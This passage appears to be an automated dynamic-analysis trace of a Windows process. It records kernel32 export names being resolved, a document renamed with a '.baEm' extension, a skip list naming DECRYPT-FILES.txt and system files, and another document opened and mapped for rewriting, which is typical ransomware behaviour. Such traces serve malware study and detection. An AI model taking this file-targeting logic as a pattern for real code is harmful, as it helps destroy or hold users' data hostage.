(lpString="CREATEFILETRANSACTEDW") returned 21 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.119] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.119] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.119] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.119] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.119] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.119] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.119] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.119] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.119] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.119] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.119] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.119] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.119] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.119] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.119] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.119] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.119] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.119] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.120] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.120] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.120] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.120] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.120] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.120] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.120] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.120] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.120] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.120] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.120] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.120] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.120] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.120] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.120] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.120] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.120] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.120] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.120] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.121] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.121] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.121] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.121] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.121] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.121] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.121] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.121] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.121] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.121] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.121] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.121] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.121] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.121] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.121] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.121] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.121] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.121] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.121] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.122] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.122] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.122] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.122] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.122] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.122] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.122] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.122] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.122] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.122] lstrlenA (lpString="DELETEATOM") returned 10 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.122] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.122] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.122] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.122] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.122] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.122] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.122] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.122] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.122] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.123] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.123] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.123] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.123] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.123] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.123] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.123] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.123] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.123] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.123] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.123] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.123] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.123] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.123] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.123] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.123] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.123] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.123] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.124] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.124] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.124] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.124] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.124] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.124] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.124] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.124] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.124] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.124] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.124] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.124] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.124] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.124] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.124] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx") returned 58 [0084.124] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx.baEm") returned 63 [0084.125] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hxlbkt0vjkkfd.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx.baEm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hxlbkt0vjkkfd.pptx.baem"), dwFlags=0x0) returned 1 [0084.125] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.125] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.126] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.126] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a326d60, ftCreationTime.dwHighDateTime=0x1d54d80, ftLastAccessTime.dwLowDateTime=0x8b465440, ftLastAccessTime.dwHighDateTime=0x1d589ac, ftLastWriteTime.dwLowDateTime=0x8b465440, ftLastWriteTime.dwHighDateTime=0x1d589ac, nFileSizeHigh=0x0, nFileSizeLow=0x1451f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iKm6.docx", cAlternateFileName="IKM6~1.DOC")) returned 1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="autorun.inf") returned 1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="boot.ini") returned 1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="desktop.ini") returned 1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="ntuser.dat") returned -1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="iconcache.db") returned 1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="bootsect.bak") returned 1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="ntuser.dat.log") returned -1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="thumbs.db") returned -1 [0084.126] lstrcmpiW (lpString1="iKm6.docx", lpString2="Bootfont.bin") returned 1 [0084.126] lstrlenW (lpString="iKm6.docx") returned 9 [0084.126] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.126] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.126] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.126] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.126] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.126] lstrlenW (lpString="iKm6.docx") returned 9 [0084.126] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.126] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="iKm6.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx" [0084.126] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ikm6.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.127] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=83231) returned 1 [0084.127] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.127] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 